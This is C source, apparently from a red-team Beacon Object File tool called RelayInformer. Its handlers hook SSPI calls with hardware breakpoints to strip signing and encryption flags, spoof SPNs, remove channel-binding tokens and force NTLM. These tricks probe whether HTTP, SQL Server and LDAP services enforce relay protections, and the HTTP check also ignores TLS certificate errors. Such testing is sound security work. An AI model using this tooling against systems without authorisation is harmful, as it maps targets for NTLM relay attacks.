    void* ip = (void*)ex->ContextRecord->Rip;
#else
    void* ip = (void*)ex->ContextRecord->Eip;
#endif
    // Ensure this DR hit is for our intended function
    if (g_hw_iscw_addr && ip != g_hw_iscw_addr) return EXCEPTION_CONTINUE_SEARCH;
    // New call: reset per-call flags
    g_cbtModified = 0;
    g_spnModified = 0;

#ifdef _WIN64
    // x64 Windows ABI: RCX, RDX, R8, R9, then stack
    PCredHandle phCredential    = (PCredHandle)ex->ContextRecord->Rcx;
    PCtxtHandle phContext       = (PCtxtHandle)ex->ContextRecord->Rdx;
    const wchar_t* pszTargetW   = (const wchar_t*)ex->ContextRecord->R8;
    ULONG fContextReq           = (ULONG)ex->ContextRecord->R9;

    // Non-intrusive: optionally strip protection flags before any further parsing
    if (g_stripProtFlags) {
        ULONG stripped = fContextReq & ~(ISC_REQ_INTEGRITY | ISC_REQ_SEQUENCE_DETECT | ISC_REQ_CONFIDENTIALITY);
        if (stripped != fContextReq) {
            ex->ContextRecord->R9 = stripped;
            fContextReq = stripped;
#ifndef BOF
            internal_printf("[ISC] ACTION: stripped INTEGRITY/CONFIDENTIALITY/SEQUENCE_DETECT -> fContextReq=0x%08X\n", fContextReq);
#endif
        }
    }

    // Safely discover a plausible pInput by scanning stack slots and validating
    PSecBufferDesc pInput = NULL;
    BYTE* spScan = (BYTE*)ex->ContextRecord->Rsp;
    for (int off = 0x20; off <= 0xA0; off += 8) {
        if (!is_readable(spScan + off, sizeof(void*))) continue;
        PSecBufferDesc cand = *(PSecBufferDesc*)(spScan + off);
        if (cand && is_readable(cand, sizeof(SecBufferDesc))) {
            SecBufferDesc tmp; MSVCRT$memcpy(&tmp, cand, sizeof(tmp));
            if (tmp.cBuffers && tmp.cBuffers <= 16 && tmp.pBuffers && is_readable(tmp.pBuffers, tmp.cBuffers * sizeof(SecBuffer))) {
                pInput = cand; break;
            }
        }
    }

    // Decide SPN override after we infer whether this is Type 1 (pInput absent)
    if (g_spnMode && !g_spnModified) {
        if (pszTargetW && (safe_wcs_has_prefix_i(pszTargetW, L"HTTP/") || safe_wcs_has_prefix_i(pszTargetW, L"MSSQLSvc/") || safe_wcs_has_prefix_i(pszTargetW, L"LDAP/"))) {
            ex->ContextRecord->R8 = (ULONG_PTR)g_fakeSpnW;
            pszTargetW = g_fakeSpnW;
            g_spnModified = 1;
            #ifndef BOF
                internal_printf("[ISC]   (SPN override active)\n");
            #endif
        }
    }

    char targetA[256] = {0};
    safe_wcs_to_utf8(pszTargetW, targetA, sizeof(targetA));

    #ifndef BOF
        internal_printf("\n");
        internal_printf("=====>InitializeSecurityContextW trap<======\n");
        internal_printf("[ISC] TargetName: %s\n", targetA[0]?targetA:"(null)");
        if (g_spnMode && g_spnModified) internal_printf("[ISC]   (SPN override active)\n");
        log_fContextReq_flags(fContextReq);
        internal_printf("[ISC] pInput=%p\n", pInput);
    #endif

    if (pInput && is_readable(pInput, sizeof(SecBufferDesc))) {
        SecBufferDesc desc; MSVCRT$memcpy(&desc, pInput, sizeof(desc));
        #ifndef BOF
            internal_printf("[ISC] pInput ver=%lu c=%lu pBuf=%p\n", desc.ulVersion, desc.cBuffers, desc.pBuffers);
        #endif

        // sanity caps
        ULONG c = desc.cBuffers;
        if (c == 0 || c > 16 || !is_readable(desc.pBuffers, c * sizeof(SecBuffer))) {
            #ifndef BOF
                internal_printf("[ISC] skip buffer walk (c=%lu or not readable)\n", c);
            #endif
        } else {
            SecBuffer local[16];
            MSVCRT$memcpy(local, desc.pBuffers, c * sizeof(SecBuffer));
            for (ULONG i = 0; i < c; i++) {
                #ifndef BOF
                    internal_printf("[ISC]  buf[%lu]: type=%lu cb=%lu pv=%p\n", i, local[i].BufferType, local[i].cbBuffer, local[i].pvBuffer);
                #endif
                if (local[i].BufferType == SECBUFFER_CHANNEL_BINDINGS && is_readable(local[i].pvBuffer, sizeof(SEC_CHANNEL_BINDINGS))) {
                    SEC_CHANNEL_BINDINGS cbh; MSVCRT$memcpy(&cbh, local[i].pvBuffer, sizeof(cbh));
                    #ifndef BOF
                        internal_printf("[ISC]   CB appOff=%lu appLen=%lu\n", cbh.dwApplicationDataOffset, cbh.cbApplicationDataLength);
                    #endif
                    BYTE* appPtr = (BYTE*)local[i].pvBuffer + cbh.dwApplicationDataOffset;
                    DWORD appLen = cbh.cbApplicationDataLength;
                    if (appLen > 0 && is_readable(appPtr, min((DWORD)512, appLen))) {
                        #ifndef BOF
                            internal_printf("[ISC]   CB appDataHex: ");
                            DWORD toPrint = (appLen > 512) ? 512 : appLen;
                            for (DWORD j = 0; j < toPrint; j++) internal_printf("%02X", appPtr[j]);
                            if (appLen > toPrint) internal_printf("...");
                            internal_printf("\n");
                        #endif
                    }
                    if (g_cbtMode != 0 && !g_cbtModified) {
                        if (g_cbtMode == 1) {
                            if (is_writable(desc.pBuffers, c * sizeof(SecBuffer))) {
                                SecBuffer *realBufs = desc.pBuffers;
                                realBufs[i].BufferType = SECBUFFER_EMPTY;
                                realBufs[i].cbBuffer = 0;
                            }
                            if (is_writable(local[i].pvBuffer, sizeof(SEC_CHANNEL_BINDINGS))) {
                                SEC_CHANNEL_BINDINGS *cbReal = (SEC_CHANNEL_BINDINGS*)local[i].pvBuffer;
                                cbReal->cbApplicationDataLength = 0;
                                cbReal->dwApplicationDataOffset = 0;
                            }
                            #ifndef BOF
                                internal_printf("[ISC]   ACTION: zeroed CBT (emptied buffer)\n");
                            #endif
                            g_cbtModified = 1;
                        } else if (g_cbtMode == 2) {
                            if (is_writable(pInput, sizeof(SecBufferDesc)) && is_writable(desc.pBuffers, c * sizeof(SecBuffer))) {
                                SecBuffer *realBufs = desc.pBuffers;
                                for (ULONG j = i; j + 1 < c; j++) {
                                    realBufs[j] = realBufs[j + 1];
                                }
                                MSVCRT$memset(&realBufs[c - 1], 0, sizeof(SecBuffer));
                                ((SecBufferDesc*)pInput)->cBuffers = c - 1;
#ifndef BOF
                                internal_printf("[ISC]   ACTION: removed CBT entry from SecBufferDesc (cBuffers=%lu -> %lu)\n", c, c - 1);
#endif
                                g_cbtModified = 1;
                            } else {
#ifndef BOF
                                internal_printf("[ISC]   ACTION: remove CBT entry FAILED (descriptor/buffer not writable)\n");
#endif
                            }
                        }
                    }
                }
            }
        }
    } else {
        #ifndef BOF
            internal_printf("[ISC] Type1 (no input) or pInput unreadable\n");
        #endif
    }
    #ifndef BOF
        internal_printf("\n");
    #endif
    #endif
    // Clear debug state and resume after DR hit
    ex->ContextRecord->EFlags |= 0x10000; // RF
    ex->ContextRecord->Dr6 = 0;
    return EXCEPTION_CONTINUE_EXECUTION;
}

static LONG CALLBACK ISC_A_VEH(EXCEPTION_POINTERS *ex) {
    DWORD code = ex->ExceptionRecord->ExceptionCode;
    if (code != 0x80000004 /* EXCEPTION_SINGLE_STEP */) return EXCEPTION_CONTINUE_SEARCH;
#ifdef _WIN64
    void* ip = (void*)ex->ContextRecord->Rip;
#else
    void* ip = (void*)ex->ContextRecord->Eip;
#endif
    // Ensure this DR hit is for our intended function
    if (g_hw_isca_addr && ip != g_hw_isca_addr) return EXCEPTION_CONTINUE_SEARCH;
    // New call: reset per-call flags
    g_cbtModified = 0;
    g_spnModified = 0;

#ifdef _WIN64
    // x64 Windows ABI: RCX, RDX, R8, R9, then stack
    PCredHandle phCredential    = (PCredHandle)ex->ContextRecord->Rcx;
    PCtxtHandle phContext       = (PCtxtHandle)ex->ContextRecord->Rdx;
    const char* pszTargetA      = (const char*)ex->ContextRecord->R8;
    ULONG fContextReq           = (ULONG)ex->ContextRecord->R9;

    // Non-intrusive: optionally strip protection flags before any further parsing
    if (g_stripProtFlags) {
        ULONG stripped = fContextReq & ~(0x00010000u /*INTEGRITY*/ | 0x00000010u /*CONFIDENTIALITY*/);
        if (stripped != fContextReq) {
            ex->ContextRecord->R9 = stripped;
            fContextReq = stripped;
            #ifndef BOF
                internal_printf("[ISC] ACTION: stripped INTEGRITY/CONFIDENTIALITY -> fContextReq=0x%08X\n", fContextReq);
            #endif
        }
    }

    // Safely discover a plausible pInput by scanning stack slots and validating
    PSecBufferDesc pInput = NULL;
    BYTE* spScan = (BYTE*)ex->ContextRecord->Rsp;
    for (int off = 0x20; off <= 0xA0; off += 8) {
        if (!is_readable(spScan + off, sizeof(void*))) continue;
        PSecBufferDesc cand = *(PSecBufferDesc*)(spScan + off);
        if (cand && is_readable(cand, sizeof(SecBufferDesc))) {
            SecBufferDesc tmp; MSVCRT$memcpy(&tmp, cand, sizeof(tmp));
            if (tmp.cBuffers && tmp.cBuffers <= 16 && tmp.pBuffers && is_readable(tmp.pBuffers, tmp.cBuffers * sizeof(SecBuffer))) {
                pInput = cand; break;
            }
        }
    }

    // Decide SPN override after we infer whether this is Type 1 (pInput absent)
    if (g_spnMode && !g_spnModified) {
        if (pszTargetA && (safe_str_has_prefix_i(pszTargetA, "HTTP/") || safe_str_has_prefix_i(pszTargetA, "MSSQLSvc/") || safe_str_has_prefix_i(pszTargetA, "LDAP/"))) {
            static char g_fakeSpnA[64];
            safe_wcs_to_utf8(g_fakeSpnW, g_fakeSpnA, sizeof(g_fakeSpnA));
            ex->ContextRecord->R8 = (ULONG_PTR)g_fakeSpnA;
            pszTargetA = g_fakeSpnA;
            g_spnModified = 1;
            #ifndef BOF
                internal_printf("[ISC]   (SPN override active)\n");
            #endif
        }
    }

    #ifndef BOF
        internal_printf("\n");
        internal_printf("=====>InitializeSecurityContextA trap<======\n");
        internal_printf("[ISC] TargetName: %s\n", pszTargetA?pszTargetA:"(null)");
        if (g_spnMode && g_spnModified) internal_printf("[ISC]   (SPN override active)\n");
        log_fContextReq_flags(fContextReq);
        internal_printf("[ISC] pInput=%p\n", pInput);
    #endif

    if (pInput && is_readable(pInput, sizeof(SecBufferDesc))) {
        SecBufferDesc desc; MSVCRT$memcpy(&desc, pInput, sizeof(desc));
        #ifndef BOF
            internal_printf("[ISC] pInput ver=%lu c=%lu pBuf=%p\n", desc.ulVersion, desc.cBuffers, desc.pBuffers);
        #endif

        // sanity caps
        ULONG c = desc.cBuffers;
        if (c == 0 || c > 16 || !is_readable(desc.pBuffers, c * sizeof(SecBuffer))) {
            #ifndef BOF
                internal_printf("[ISC] skip buffer walk (c=%lu or not readable)\n", c);
            #endif
        } else {
            SecBuffer local[16];
            MSVCRT$memcpy(local, desc.pBuffers, c * sizeof(SecBuffer));
            for (ULONG i = 0; i < c; i++) {
                #ifndef BOF
                    internal_printf("[ISC]  buf[%lu]: type=%lu cb=%lu pv=%p\n", i, local[i].BufferType, local[i].cbBuffer, local[i].pvBuffer);
                #endif
                if (local[i].BufferType == SECBUFFER_CHANNEL_BINDINGS && is_readable(local[i].pvBuffer, sizeof(SEC_CHANNEL_BINDINGS))) {
                    SEC_CHANNEL_BINDINGS cbh; MSVCRT$memcpy(&cbh, local[i].pvBuffer, sizeof(cbh));
                    #ifndef BOF
                        internal_printf("[ISC]   CB appOff=%lu appLen=%lu\n", cbh.dwApplicationDataOffset, cbh.cbApplicationDataLength);
                    #endif
                    BYTE* appPtr = (BYTE*)local[i].pvBuffer + cbh.dwApplicationDataOffset;
                    DWORD appLen = cbh.cbApplicationDataLength;
                    if (appLen > 0 && is_readable(appPtr, min((DWORD)512, appLen))) {
                        #ifndef BOF
                            internal_printf("[ISC]   CB appDataHex: ");
                            DWORD toPrint = (appLen > 512) ? 512 : appLen;
                            for (DWORD j = 0; j < toPrint; j++) internal_printf("%02X", appPtr[j]);
                            if (appLen > toPrint) internal_printf("...");
                            internal_printf("\n");
                        #endif
                    }
                    if (g_cbtMode != 0 && !g_cbtModified) {
                        if (g_cbtMode == 1) {
                            if (is_writable(desc.pBuffers, c * sizeof(SecBuffer))) {
                                SecBuffer *realBufs = desc.pBuffers;
                                realBufs[i].BufferType = SECBUFFER_EMPTY;
                                realBufs[i].cbBuffer = 0;
                            }
                            if (is_writable(local[i].pvBuffer, sizeof(SEC_CHANNEL_BINDINGS))) {
                                SEC_CHANNEL_BINDINGS *cbReal = (SEC_CHANNEL_BINDINGS*)local[i].pvBuffer;
                                cbReal->cbApplicationDataLength = 0;
                                cbReal->dwApplicationDataOffset = 0;
                            }
                            #ifndef BOF
                                internal_printf("[ISC]   ACTION: zeroed CBT (emptied buffer)\n");
                            #endif
                            g_cbtModified = 1;
                        } else if (g_cbtMode == 2) {
                            if (is_writable(pInput, sizeof(SecBufferDesc)) && is_writable(desc.pBuffers, c * sizeof(SecBuffer))) {
                                SecBuffer *realBufs = desc.pBuffers;
                                for (ULONG j = i; j + 1 < c; j++) {
                                    realBufs[j] = realBufs[j + 1];
                                }
                                MSVCRT$memset(&realBufs[c - 1], 0, sizeof(SecBuffer));
                                ((SecBufferDesc*)pInput)->cBuffers = c - 1;
                                #ifndef BOF
                                    internal_printf("[ISC]   ACTION: removed CBT entry from SecBufferDesc (cBuffers=%lu -> %lu)\n", c, c - 1);
                                #endif
                                g_cbtModified = 1;
                            } else {
                                #ifndef BOF
                                    internal_printf("[ISC]   ACTION: remove CBT entry FAILED (descriptor/buffer not writable)\n");
                                #endif
                            }
                        }
                    }
                }
            }
        }
    } else {
        #ifndef BOF
            internal_printf("[ISC] Type1 (no input) or pInput unreadable\n");
        #endif
    }
    #ifndef BOF
        internal_printf("\n");
    #endif
    #endif
    // Clear debug state and resume after DR hit
    ex->ContextRecord->EFlags |= 0x10000; // RF
    ex->ContextRecord->Dr6 = 0;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Separate VEH for AcquireCredentialsHandleW to keep logic isolated and clearer
static LONG CALLBACK ACH_VEH(EXCEPTION_POINTERS *ex) {
    if (ex->ExceptionRecord->ExceptionCode != 0x80000004 /* EXCEPTION_SINGLE_STEP */) return EXCEPTION_CONTINUE_SEARCH;
#ifdef _WIN64
    void* ip = (void*)ex->ContextRecord->Rip;
#else
    void* ip = (void*)ex->ContextRecord->Eip;
#endif
    // Ensure this DR hit is for our intended function
    if (g_hw_achw_addr && ip != g_hw_achw_addr) return EXCEPTION_CONTINUE_SEARCH;

#ifdef _WIN64
    const wchar_t* pkg = (const wchar_t*)ex->ContextRecord->Rdx; // AcquireCredentialsHandleW: RDX = package
    char pkgA[128] = {0};
    if (pkg && is_readable(pkg, sizeof(wchar_t))) safe_wcs_to_utf8(pkg, pkgA, sizeof(pkgA));
    #ifndef BOF
        internal_printf("=====>AcquireCredentialsHandleW trap<======\n");
        internal_printf("[ACH] Package: %s\n", pkgA[0]?pkgA:"(null)");
    #endif
    if (g_forceNtlm) {
        static wchar_t g_ntlmW[8] = L"NTLM";
        BOOL okToForce = FALSE;
        if (!pkg) okToForce = TRUE;
        else if (is_readable(pkg, sizeof(wchar_t))) {
            if (safe_wcs_has_prefix_i(pkg, L"Negotiate") || safe_wcs_has_prefix_i(pkg, L"Kerberos")) okToForce = TRUE;
        }
        if (okToForce) {
            ex->ContextRecord->Rdx = (ULONG_PTR)g_ntlmW;
            #ifndef BOF
                internal_printf("[ACH]   ACTION: forced package to NTLM\n");
            #endif
        }
    }
    #endif

    // Clear debug state and resume
    ex->ContextRecord->EFlags |= 0x10000; // RF
    ex->ContextRecord->Dr6 = 0;
    return EXCEPTION_CONTINUE_EXECUTION;
}

// Separate VEH for AcquireCredentialsHandleA to keep logic isolated and clearer
static LONG CALLBACK ACH_A_VEH(EXCEPTION_POINTERS *ex) {
    if (ex->ExceptionRecord->ExceptionCode != 0x80000004 /* EXCEPTION_SINGLE_STEP */) return EXCEPTION_CONTINUE_SEARCH;
#ifdef _WIN64
    void* ip = (void*)ex->ContextRecord->Rip;
#else
    void* ip = (void*)ex->ContextRecord->Eip;
#endif
    // Ensure this DR hit is for our intended function
    if (g_hw_acha_addr && ip != g_hw_acha_addr) return EXCEPTION_CONTINUE_SEARCH;

#ifdef _WIN64
    const char* pkg = (const char*)ex->ContextRecord->Rdx; // AcquireCredentialsHandleA: RDX = package
    #ifndef BOF
        internal_printf("=====>AcquireCredentialsHandleA trap<======\n");
        internal_printf("[ACH] Package: %s\n", pkg ? pkg : "(null)");
    #endif
    if (g_forceNtlm) {
        static char g_ntlmA[8] = "NTLM";
        BOOL okToForce = FALSE;
        if (!pkg) okToForce = TRUE;
        else if (is_readable(pkg, 1)) {
            if (MSVCRT$_strnicmp(pkg, "Negotiate", 9) == 0 || MSVCRT$_strnicmp(pkg, "Kerberos", 8) == 0) okToForce = TRUE;
        }
        if (okToForce) {
            ex->ContextRecord->Rdx = (ULONG_PTR)g_ntlmA;
            #ifndef BOF
                internal_printf("[ACH]   ACTION: forced package to NTLM\n");
            #endif
        }
    }
    #endif

    // Clear debug state and resume
    ex->ContextRecord->EFlags |= 0x10000; // RF
    ex->ContextRecord->Dr6 = 0;
    return EXCEPTION_CONTINUE_EXECUTION;
}

================================================
FILE: AD-BOF/RelayInformer/common/sql.c
================================================
#include <windows.h>
#include <sql.h>
#include <odbcss.h>


//
// prints a SQL error message
//
SQLINTEGER ShowError(unsigned int handletype, const SQLHANDLE* handle)
{
    SQLCHAR sqlstate[1024];
    SQLCHAR message[1024];
    SQLINTEGER nativeError = 0;
    ODBC32$SQLGetDiagRec(handletype, (SQLHANDLE)handle, 1, sqlstate, &nativeError, message, 1024, NULL);
    return nativeError;
}

// Return codes for TDS PreLogin encryption policy
// 0: ENCRYPT_OFF, 1: ENCRYPT_ON, 2: ENCRYPT_NOT_SUP, 3: ENCRYPT_REQ

// Minimal TDS PreLogin over TCP to query server encryption policy
// Returns: -1 error; otherwise ENCRYPT_* value read from server ENCRYPTION option
int TdsPreloginCheckEncryption(const char* host, unsigned short port) {
    
    WSADATA wsa; if (WS2_32$WSAStartup(MAKEWORD(2,2), &wsa) != 0) return -1;
    SOCKET s = WS2_32$socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (s == INVALID_SOCKET) { WS2_32$WSACleanup(); return -1; }

    struct sockaddr_in sin; intZeroMemory(&sin, sizeof(sin));
    sin.sin_family = AF_INET;
    sin.sin_port = WS2_32$htons(port);
    if (WS2_32$inet_pton(AF_INET, host, &sin.sin_addr) != 1) {
        // Fallback DNS resolution
        struct addrinfo hints; intZeroMemory(&hints, sizeof(hints));
        hints.ai_family = AF_INET; hints.ai_socktype = SOCK_STREAM; hints.ai_protocol = IPPROTO_TCP;
        struct addrinfo* res = NULL;
        if (WS2_32$getaddrinfo(host, NULL, &hints, &res) == 0 && res) {
            struct sockaddr_in* ain = (struct sockaddr_in*)res->ai_addr;
            sin.sin_addr = ain->sin_addr;
            WS2_32$freeaddrinfo(res);
        } else { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
    }

    if (WS2_32$connect(s, (struct sockaddr*)&sin, sizeof(sin)) != 0) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    // Build PreLogin request with VERSION and ENCRYPTION options
    // Option table: [Token(1) Offset(2) Length(2)] ... 0xFF terminator ... data blobs
    unsigned char payload[64]; int p = 0;
    const unsigned char TOKEN_VERSION    = 0x00;
    const unsigned char TOKEN_ENCRYPTION = 0x01;

    // VERSION entry
    payload[p++] = TOKEN_VERSION;
    int verOffPos = p; payload[p++] = 0; payload[p++] = 0; // offset placeholder
    payload[p++] = 0x00; payload[p++] = 0x06; // length = 6

    // ENCRYPTION entry
    payload[p++] = TOKEN_ENCRYPTION;
    int encOffPos = p; payload[p++] = 0; payload[p++] = 0; // offset placeholder
    payload[p++] = 0x00; payload[p++] = 0x01; // length = 1

    // Terminator
    payload[p++] = 0xFF;

    // Data blobs start here
    int dataStart = p;
    // VERSION 6 bytes: major, minor, buildHi, buildLo, subBuildHi, subBuildLo
    // Use requested version 8.0.341 => major=8, minor=0, build=341 (0x0155), subBuild=0
    payload[p++] = 0x08; // major
    payload[p++] = 0x00; // minor
    payload[p++] = 0x01; // build hi (0x0155)
    payload[p++] = 0x55; // build lo
    payload[p++] = 0x00; // subBuild hi
    payload[p++] = 0x00; // subBuild lo

    // ENCRYPTION value (client value is ignored; server replies with its policy)
    payload[p++] = 0x00; // send 0x00 here; server will still return its policy

    // Patch offsets (big-endian) relative to start of payload
    int verDataOff = dataStart;
    int encDataOff = dataStart + 6;
    payload[verOffPos]   = (unsigned char)((verDataOff >> 8) & 0xFF);
    payload[verOffPos+1] = (unsigned char)(verDataOff & 0xFF);
    payload[encOffPos]   = (unsigned char)((encDataOff >> 8) & 0xFF);
    payload[encOffPos+1] = (unsigned char)(encDataOff & 0xFF);

    // Build TDS header + payload
    unsigned char pkt[96]; int idx = 0;
    pkt[idx++] = 0x12; // PRELOGIN
    pkt[idx++] = 0x01; // EOM
    int lenPos = idx; pkt[idx++] = 0; pkt[idx++] = 0; // Length (to patch)
    pkt[idx++] = 0x00; pkt[idx++] = 0x00; // SPID
    pkt[idx++] = 0x01; // PacketID
    pkt[idx++] = 0x00; // Window

    int payloadLen = p;
    for (int i = 0; i < payloadLen; i++) pkt[idx++] = payload[i];

    int totalLen = idx;
    pkt[lenPos]   = (unsigned char)((totalLen >> 8) & 0xFF);
    pkt[lenPos+1] = (unsigned char)(totalLen & 0xFF);

    if (WS2_32$send(s, (const char*)pkt, totalLen, 0) != totalLen) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    // Read full response based on TDS header length
    unsigned char resp[1024]; int received = 0;
    // First read header
    while (received < 8) {
        int r = WS2_32$recv(s, (char*)resp + received, 8 - received, 0);
        if (r <= 0) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }
        received += r;
    }
    int respLen = ((int)resp[2] << 8) | resp[3];
    if (respLen < 8 || respLen > (int)sizeof(resp)) respLen = (int)sizeof(resp);
    while (received < respLen) {
        int r = WS2_32$recv(s, (char*)resp + received, respLen - received, 0);
        if (r <= 0) break;
        received += r;
    }
    if (received < 9) { WS2_32$closesocket(s); WS2_32$WSACleanup(); return -1; }

    // Parse response option table
    const unsigned char* rp = resp + 8; int rem = received - 8; int i = 0;
    int encOffset = -1, encLen = 0;
    while (i < rem) {
        unsigned char tok = rp[i++];
        if (tok == 0xFF) break; // terminator
        if (i + 4 > rem) break;
        int off = ((int)rp[i] << 8) | rp[i+1]; i += 2;
        int len = ((int)rp[i] << 8) | rp[i+1]; i += 2;
        if (tok == TOKEN_ENCRYPTION) { encOffset = off; encLen = len; }
    }
    int result = -1;
    if (encOffset >= 0 && encLen >= 1 && encOffset + encLen <= rem) {
        result = (int)rp[encOffset];
    }

    WS2_32$closesocket(s);
    WS2_32$WSACleanup();
    return result;
}

//
// Clear the cursor so it can be closed without a 24000 Invalid Cursor State error
//
void ClearCursor(SQLHSTMT stmt)
{
    SQLRETURN ret = SQL_SUCCESS;
    
    //
    // Fetch all results to clear the cursor
    //
    while(ret == SQL_SUCCESS || ret == SQL_SUCCESS_WITH_INFO) {
        ODBC32$SQLFetch(stmt);
        ret = ODBC32$SQLMoreResults(stmt);
    }
}

//
// Connect to a SQL server
//
SQLHDBC ConnectToSqlServer(SQLHENV* env, char* server, int port, char* dbName, SQLINTEGER* nativeError)
{
    SQLRETURN ret;
    SQLCHAR connstr[1024];
    SQLHDBC dbc = NULL;

    // Allocate an environment handle and set ODBC version
    ret = ODBC32$SQLAllocHandle(SQL_HANDLE_ENV, SQL_NULL_HANDLE, env);
    if (!SQL_SUCCEEDED(ret)) { ShowError(SQL_HANDLE_ENV, *env); return NULL; }
    ret = ODBC32$SQLSetEnvAttr(*env, SQL_ATTR_ODBC_VERSION, (SQLPOINTER)SQL_OV_ODBC3, 0);
    if (!SQL_SUCCEEDED(ret)) { ShowError(SQL_HANDLE_ENV, *env); return NULL; }

    // Allocate a connection handle
    ret = ODBC32$SQLAllocHandle(SQL_HANDLE_DBC, *env, &dbc);
    if (!SQL_SUCCEEDED(ret)) { ShowError(SQL_HANDLE_ENV, *env); return NULL; }

    if (dbName == NULL)
    {
        MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s,%d;Trusted_Connection=Yes;TrustServerCertificate=yes;", server, port);
    } else
    {
        MSVCRT$sprintf((char*)connstr, "DRIVER={SQL Server};SERVER=%s,%d;DATABASE=%s;Trusted_Connection=Yes;TrustServerCertificate=yes;", server, port, dbName);
    }
    
    ret = ODBC32$SQLDriverConnect(dbc, NULL, connstr, SQL_NTS, NULL, 0, NULL, SQL_DRIVER_NOPROMPT);
    
    if (!SQL_SUCCEEDED(ret))
    {
        *nativeError = ShowError(SQL_HANDLE_DBC, dbc);
        return NULL;
    }
    
    return dbc;
}

//
// Close the connection to a SQL server
//
void DisconnectSqlServer(SQLHENV env, SQLHDBC dbc, SQLHSTMT stmt)
{
    SQLRETURN ret;

    if (stmt != NULL) { ret = ODBC32$SQLFreeHandle(SQL_HANDLE_STMT, stmt); }
    if (dbc != NULL) {
        ret = ODBC32$SQLDisconnect(dbc);
        ret = ODBC32$SQLFreeHandle(SQL_HANDLE_DBC, dbc);
    }
    if (env != NULL) { ret = ODBC32$SQLFreeHandle(SQL_HANDLE_ENV, env); }
}



================================================
FILE: AD-BOF/RelayInformer/relay-informer-http/entry.c
================================================
#include "bofdefs.h"
#include "base.c"

static wchar_t g_fakeSpnW[64] = L"HTTP/relay.informer";
#include "hwbp.c"

// Global variables for hardware breakpoints
PVOID vehAchW = NULL;
void* addrAchW = NULL;
PVOID vehIscW = NULL;
void* addrIscW = NULL;

//
// HTTPS case has to handle thread switch, so this func will be called multiple times
// instead of just once at the start of CheckProtection()
//
static BOOL ArmBps(){
    // ACH-W: register VEH once; re-arm only thereafter
    if (!vehAchW) {
        if (!HWBP_SetOnApiEx("sspicli.dll", "AcquireCredentialsHandleW", 0, ACH_VEH, &vehAchW, &addrAchW, TRUE)) {
            internal_printf("Failed to set HWBP on sspicli!AcquireCredentialsHandleW (DR0).\n");
            return FALSE;
        }
    } else {
        // Re-arm across threads without re-registering VEH
        if (!HWBP_SetOnApiEx("sspicli.dll", "AcquireCredentialsHandleW", 0, NULL, NULL, &addrAchW, TRUE)) {
            internal_printf("Failed to re-arm HWBP on AcquireCredentialsHandleW (DR0).\n");
            return FALSE;
        }
    }

    // ISC-W: register VEH once; re-arm only thereafter
    if (!vehIscW) {
        if (!HWBP_SetOnApiEx("sspicli.dll", "InitializeSecurityContextW", 1, ISC_VEH, &vehIscW, &addrIscW, TRUE)) {
            internal_printf("Failed to set HWBP on sspicli!InitializeSecurityContextW (DR1).\n");
            return FALSE;
        }
    } else {
        if (!HWBP_SetOnApiEx("sspicli.dll", "InitializeSecurityContextW", 1, NULL, NULL, &addrIscW, TRUE)) {
            internal_printf("Failed to re-arm HWBP on InitializeSecurityContextW (DR1).\n");
            return FALSE;
        }
    }
    return TRUE;
}


//
// Trigger NTLM auth over HTTP/S
//
static DWORD trigger_winhttp_ntlm(wchar_t* kHost, wchar_t* kPath, INTERNET_PORT kPort, BOOL ssl) {
	// Session
	HINTERNET hSes = WINHTTP$WinHttpOpen(L"Relay-Informer/1.0",
									  WINHTTP_ACCESS_TYPE_DEFAULT_PROXY,
									  WINHTTP_NO_PROXY_NAME,
									  WINHTTP_NO_PROXY_BYPASS, 0);
	if (!hSes) { return 0; }

	DWORD pol = WINHTTP_AUTOLOGON_SECURITY_LEVEL_LOW;
	WINHTTP$WinHttpSetOption(hSes, WINHTTP_OPTION_AUTOLOGON_POLICY, &pol, sizeof(pol));

	// Connect + Request (single handle for whole handshake)
	HINTERNET hConn = WINHTTP$WinHttpConnect(hSes, kHost, kPort, 0);
	if (!hConn) { WINHTTP$WinHttpCloseHandle(hSes); return 0; }

	HINTERNET hReq = WINHTTP$WinHttpOpenRequest(hConn, L"GET", kPath, NULL,
											  WINHTTP_NO_REFERER,
											  WINHTTP_DEFAULT_ACCEPT_TYPES,
											  ssl ? WINHTTP_FLAG_SECURE : 0);
	if (!hReq) { WINHTTP$WinHttpCloseHandle(hConn); WINHTTP$WinHttpCloseHandle(hSes); return 0; }

	// Rearm hardware breakpoints to handle potential thread switch
	ArmBps();

	if (ssl) {
		// Hardcode: ignore TLS cert errors (CN/date/CA)
		DWORD secFlags = SECURITY_FLAG_IGNORE_CERT_CN_INVALID
					   | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
					   | SECURITY_FLAG_IGNORE_UNKNOWN_CA;
		
		WINHTTP$WinHttpSetOption(hReq, WINHTTP_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags));
	}

	WINHTTP$WinHttpAddRequestHeaders(hReq, L"Connection: keep-alive", (DWORD)-1, WINHTTP_ADDREQ_FLAG_ADD);

	// 1) First unauthenticated request → expect 401
	if (!WINHTTP$WinHttpSendRequest(hReq, WINHTTP_NO_ADDITIONAL_HEADERS, 0,
						WINHTTP_NO_REQUEST_DATA, 0, 0, 0)) {
		WINHTTP$WinHttpCloseHandle(hReq); WINHTTP$WinHttpCloseHandle(hConn); WINHTTP$WinHttpCloseHandle(hSes); return 0;
	}

	// Rearm hardware breakpoints to handle potential thread switch
	ArmBps();

	if (!WINHTTP$WinHttpReceiveResponse(hReq, NULL)) {
		WINHTTP$WinHttpCloseHandle(hReq); WINHTTP$WinHttpCloseHandle(hConn); WINHTTP$WinHttpCloseHandle(hSes); return 0;
	}

	DWORD status=0, cb=sizeof(status);
	WINHTTP$WinHttpQueryHeaders(hReq, WINHTTP_QUERY_STATUS_CODE | WINHTTP_QUERY_FLAG_NUMBER,
						NULL, &status, &cb, NULL);

	// with LOW SSO, winhttp should complete the ntlm handshake by now
	// so we should get a 200 here, if all EPA/service binding requirements are met

	WINHTTP$WinHttpCloseHandle(hReq); WINHTTP$WinHttpCloseHandle(hConn); WINHTTP$WinHttpCloseHandle(hSes);
	return status;
}

//
// Main test loginc
//
void CheckProtection(wchar_t* URL) {
    wchar_t* kHost = NULL;
    wchar_t* kPath = NULL;
    INTERNET_PORT kPort = 0;
